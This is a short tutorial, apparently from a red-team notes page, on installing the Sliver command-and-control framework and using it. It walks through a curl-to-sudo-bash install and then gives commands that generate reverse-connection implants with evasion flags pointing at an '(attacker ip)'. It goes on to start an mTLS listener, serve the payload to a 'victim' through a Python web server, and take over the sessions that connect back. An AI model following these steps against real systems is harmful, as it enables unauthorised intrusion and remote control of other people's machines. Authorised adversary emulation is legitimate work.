Sliver
Sliver is an open source projected created and maintained by BishopFox as an open source multi-platform adversary emulation and red team tool. Sliver facilitates the generations of reverse connection payloads as EXE, DLL, or Shellcode.
Installing
It has binaries for Windows, Linux, MacOS allowing you to deploy Sliver C2 infrastructure on any system.
Pre-reqs
sudo apt install -y mingw-w64 binutils-mingw-w64 g++-mingw-w64
Running
This can be downloaded directly from the Sliver Repo using wget or directly.
Install on system
curl https://sliver.sh/install | sudo bash
Run it
sliver

Standalone release
wget https://github.com/BishopFox/sliver/releases/download/v1.4.14/sliver-server_linux.zip

Unzip the file
unzip sliver-server_linux.zip

Make it executable
chmod +x sliver-server
run it
sudo ./sliver-server

Usage
Making a payload
to generate at payload you must know your IP address(external if this is hosted externally). This will generate a randomly named executable file file that can be delivered to targets in a variety of ways. The flags -m
and -e
flags used above represent Natural-TLS connection to use to connect back on and evasion respectively. The IP address entered is the IP address of your Sliver server.
generate -m (attacker ip) -e

The executable file will be in the folder where sliver was run.

Making .dll payload
generate —mtls (attacker ip) —format shared —skip-symbols
Starting The MTLS Listener
The listener must be started before the delivery and exectuion of the payload on a target system. This listener will display all active connectsions from target systems to your C2 server.
mtls

Exploit
Get the executable onto the victim. I'll do this via a quick python webserver.
python3 -m http.server 8008

When the server is being accessed and a file is being downloaded

On the victim machine go to the webserver and click on the file you want to download


Once it is executed, we should see the connection from the sliver terminal.

We can also check on active sessions or alive sessions with sessions

Connect to the session
sessions -i (session id)

Run whatever commands you may need/want:

Last updated